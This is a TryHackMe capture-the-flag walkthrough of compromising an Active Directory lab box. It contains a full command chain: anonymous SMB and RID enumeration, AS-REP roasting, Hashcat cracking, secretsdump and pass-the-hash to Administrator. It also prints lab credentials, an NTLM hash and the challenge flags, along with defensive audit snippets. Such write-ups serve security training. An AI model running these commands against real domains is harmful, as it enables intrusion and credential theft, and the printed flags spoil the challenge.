Overview

Difficulty: Easy
Platform: TryHackMe
Focus Areas: Active Directory Enumeration, SMB, Kerberos, AS-REP Roasting, Lateral Movement, Privilege Escalation

This writeup walks through my full approach to compromising the VulnNet: Roasted machine. The box revolves around Active Directory misconfigurations, particularly around user enumeration and Kerberos abuse.

Image: TryHackMe VulnNet: Roasted

Initial Recon

As always, I started with a full port scan using Nmap:

nmap -sC -sV -Pn 10.146.188.199
Image: Nmap Scan

Key Findings

The scan revealed several important services:

  • Kerberos (88)
  • LDAP (389)
  • SMB (445)

This immediately suggested an Active Directory environment, so my focus shifted toward domain enumeration and credential harvesting.

SMB Enumeration (Anonymous Access)

I checked for anonymous SMB access:

smbclient -L //10.146.188.199 -N
Image: Anonymous SMB Login

Anonymous login was allowed, and I was able to list available shares. I connected to accessible shares and downloaded files:

smbclient //10.146.188.199/VulnNet-Business-Anonymous -N
smbclient //10.146.188.199/VulnNet-Enterprise-Anonymous -N
Image: Extracting Anonymous Share Data

Findings

  • Discovered files containing potential usernames
  • Created a custom username wordlist from gathered data
Image: Anonymous Share Data

Kerberos Attacks — First Attempt

With usernames in hand, I attempted AS-REP Roasting:

impacket-GetNPUsers vulnnet-rst.local/ -dc-ip 10.146.188.199 -usersfile users.txt
Image: AS-REP Roasting

❌ No luck — none of the users had "Do not require Kerberos preauthentication" enabled.

Next, I tried validating usernames using Kerbrute:

kerbrute userenum -d vulnnet-rst.local/ --dc 10.146.181.101 users.txt
Image: Kerbrute Username Enumeration

❌ Still no success — no valid usernames confirmed.

SID Enumeration (Breakthrough)

At this point, I pivoted to RID cycling using Impacket:

impacket-lookupsid anonymous@10.146.181.101
Image: SID Enumeration

✅ This worked and revealed valid domain users.

This was a key turning point — the earlier username list was incomplete.
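To make the mechanics of that breakthrough concrete, here is an added example (my own illustration, not part of the original walkthrough or any Impacket code): a small parser for lookupsid-style output that shows what a domain controller hands an anonymous caller, and why cycling RIDs is a complete enumeration. Every RID, SID and name in the sample is constructed; only the domain label follows the box.

```python
import re

# Added example, not from the original writeup: what an anonymous RID-cycling
# query (Impacket lookupsid-style output) discloses. All SIDs, RIDs and account
# names below are constructed.

# A domain account SID is <domain SID>-<RID>. RIDs below 1000 are fixed by
# Windows; everything from 1000 upward is issued sequentially, which is why
# walking 500..N enumerates every principal the DC will resolve.
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins",
}

DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(sid: str) -> tuple[str, int]:
    """Split an account SID into (domain SID, RID)."""
    m = DOMAIN_SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain account SID: {sid}")
    return m.group(1), int(m.group(2))


# lookupsid prints one line per resolved RID: "<rid>: <DOMAIN>\<name> (<SidType>)"
LOOKUP_LINE_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+) \((SidType\w+)\)$")


def parse_lookupsid_output(lines):
    """Turn lookupsid-style lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in lines:
        m = LOOKUP_LINE_RE.match(line.strip())
        if m:
            entries.append({"rid": int(m.group(1)), "domain": m.group(2),
                            "name": m.group(3), "type": m.group(4)})
    return entries


def user_accounts(entries):
    """Human user accounts (SidTypeUser, not machine accounts ending in '$')."""
    return [e["name"] for e in entries
            if e["type"] == "SidTypeUser" and not e["name"].endswith("$")]


def describe(entries):
    """Label well-known RIDs and count admin-created principals (RID >= 1000)."""
    labelled = {e["rid"]: WELL_KNOWN_RIDS.get(e["rid"], "custom") for e in entries}
    custom = sum(1 for e in entries if e["rid"] >= 1000)
    return labelled, custom


SAMPLE_OUTPUT = [  # constructed to mirror lookupsid's line format
    r"500: VULNNET-RST\Administrator (SidTypeUser)",
    r"501: VULNNET-RST\Guest (SidTypeUser)",
    r"502: VULNNET-RST\krbtgt (SidTypeUser)",
    r"512: VULNNET-RST\Domain Admins (SidTypeGroup)",
    r"513: VULNNET-RST\Domain Users (SidTypeGroup)",
    r"1000: VULNNET-RST\EXAMPLE-DC$ (SidTypeUser)",
    r"1105: VULNNET-RST\t-skid (SidTypeUser)",
    r"1106: VULNNET-RST\a-whitehat (SidTypeUser)",
]

if __name__ == "__main__":
    entries = parse_lookupsid_output(SAMPLE_OUTPUT)
    print("users an anonymous caller learns:", user_accounts(entries))
    print(describe(entries))
    print(split_sid("S-1-5-21-1111111111-2222222222-3333333333-1105"))
```

The defensive counterpart is the pair of security options "Network access: Allow anonymous SID/Name translation" (set to Disabled) and "Network access: Do not allow anonymous enumeration of SAM accounts and shares" (set to Enabled); with those in place the lookups above require an authenticated session.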

AS-REP Roasting — Success

Using the newly discovered usernames:

impacket-GetNPUsers vulnnet-rst.local/ -dc-ip 10.146.181.101 -usersfile username.txt
Image: Successful AS-REP Roasting

✅ Successfully retrieved a Kerberos AS-REP hash for one user.
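As an added example (my own, not code from the original writeup or from Impacket), here is the check a defender runs for the property this attack depends on: the DONT_REQ_PREAUTH bit (0x400000) in userAccountControl, together with a parser for the hash line GetNPUsers emits so you can see which encryption type you are dealing with. The account records and the hash line are constructed; the flag values come from the AD schema.

```python
import re

# Added example, not from the original writeup: audit userAccountControl for the
# setting AS-REP roasting depends on, and parse a GetNPUsers hash line.
# The account records and the hash line are constructed.

# userAccountControl bit values (AD schema)
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000   # "Do not require Kerberos preauthentication"

UAC_FLAGS = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    PASSWD_NOTREQD: "PASSWD_NOTREQD",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
    DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
}

# Equivalent LDAP filter for a live directory (bitwise-AND matching rule):
#   (&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))


def decode_uac(value: int) -> list[str]:
    """Names of the known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def roastable_accounts(records) -> list[str]:
    """Enabled accounts with pre-authentication disabled: these return an AS-REP
    encrypted with the user's key to anyone who asks."""
    out = []
    for rec in records:
        uac = int(rec["userAccountControl"])
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            out.append(rec["sAMAccountName"])
    return out


# GetNPUsers output / hashcat mode 18200 line:
#   $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<encrypted data>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(\d+)\$([^@]+)@([^:]+):([0-9a-f]+)\$([0-9a-f]+)$", re.IGNORECASE)


def parse_asrep_hash(line: str) -> dict:
    """Extract etype, user and realm from a GetNPUsers hash line.
    etype 23 is RC4-HMAC, the one hashcat mode 18200 cracks."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line")
    return {"etype": int(m.group(1)), "user": m.group(2), "realm": m.group(3)}


SAMPLE_RECORDS = [  # constructed; the flag values are invented for illustration
    {"sAMAccountName": "t-skid", "userAccountControl": 0x400200},        # enabled, no pre-auth
    {"sAMAccountName": "a-whitehat", "userAccountControl": 0x10200},      # enabled, pwd never expires
    {"sAMAccountName": "old-svc", "userAccountControl": 0x400202},        # no pre-auth, but disabled
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200},
]

# constructed placeholder: checksum and ciphertext are zero bytes, not real data
SAMPLE_ASREP = "$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:" + "00" * 16 + "$" + "00" * 32

if __name__ == "__main__":
    print("roastable:", roastable_accounts(SAMPLE_RECORDS))
    print("old-svc flags:", decode_uac(0x400202))
    print(parse_asrep_hash(SAMPLE_ASREP))
```

The fix is to clear the flag on every account that does not have a documented reason for it (in PowerShell, `Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}` lists them); where it must stay, a long random password and AES-only encryption types take the RC4 fast path off the table.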

Cracking the Hash

I used Hashcat to crack the hash:

hashcat -m 18200 hash.txt rockyou.txt
Image: Successful Hash Cracking using Hashcat

✅ Password recovered successfully.

SMB Access with Credentials

With valid credentials:

smbmap -H 10.146.181.101 -u t-skid -p tj072889*
Image: Smbmap Listing Share Permissions

Findings

  • Access to additional shares with read permissions

I connected to those shares:

smbclient //10.146.181.101/NETLOGON -U t-skid
Image: NETLOGON Share Data Extraction

Results

  • Found files containing credentials for another user
Image: Found Hardcoded Credentials

Lateral Movement

Using the second set of credentials:

smbmap -H 10.146.181.101 -u a-whitehat -p bNdKVkjv3RR9ht
Image: Smbmap Listing Share Permissions

Then I tried to access the ADMIN$ and C$ shares:

smbclient //10.146.181.101/C$ -U a-whitehat
Image: C$ Share Data Access
Image: User Flag File

Outcome

  • Access to more sensitive data
  • Retrieved the user flag

Image: User Flag

User Flag: THM{726b7c0baaac1455d05c827b5561f4ed}

Privilege Escalation

Next, I attempted to dump hashes:

impacket-secretsdump vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@10.146.181.101
Image: Hash Dumping

✅ Successfully dumped hashes, including the Administrator hash.

Attempted Hash Cracking

hashcat -m 1000 admin_hash.txt rockyou.txt
Image: Hash Cracking using Hashcat

❌ Failed — password not crackable via wordlist.

Pass-the-Hash Attempts

I tried Impacket's psexec first:

impacket-psexec administrator@10.146.181.101 -hashes :c2597747aa5e43022a3a3049a3c3b09d
Image: Pass-the-Hash using Psexec

❌ Failed.

Then tried Evil-WinRM:

evil-winrm -i 10.146.173.32 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d
Image: Pass-the-Hash using Evil-WinRM

✅ Success! Gained Administrator access

Final Step

Once inside:

cat C:\Users\Administrator\Desktop\system.txt
Image: System Flag

🎉 Retrieved the system (root) flag:

System Flag: THM{16f45e3934293a57645f8d7bf71d8d4c}

Key Takeaways

  • Anonymous SMB access can leak valuable intel
  • RID cycling (lookupsid) is extremely useful when username lists fail
  • AS-REP roasting is powerful when pre-auth is disabled
  • Always check for credential reuse across shares
  • Pass-the-Hash may work differently depending on the tool — don't rely on just one

Tools Used

  • Nmap, smbclient, smbmap, Kerbrute, Impacket suite (GetNPUsers, lookupsid, secretsdump, psexec), Hashcat, Evil-WinRM

Conclusion

This machine highlights the importance of thorough enumeration and persistence. Initial attempts may fail, but alternative techniques like SID enumeration can uncover new attack paths.

If you're preparing for OSCP or similar certifications, this box is excellent practice for:

  • Active Directory attacks
  • Kerberos abuse
  • Lateral movement strategies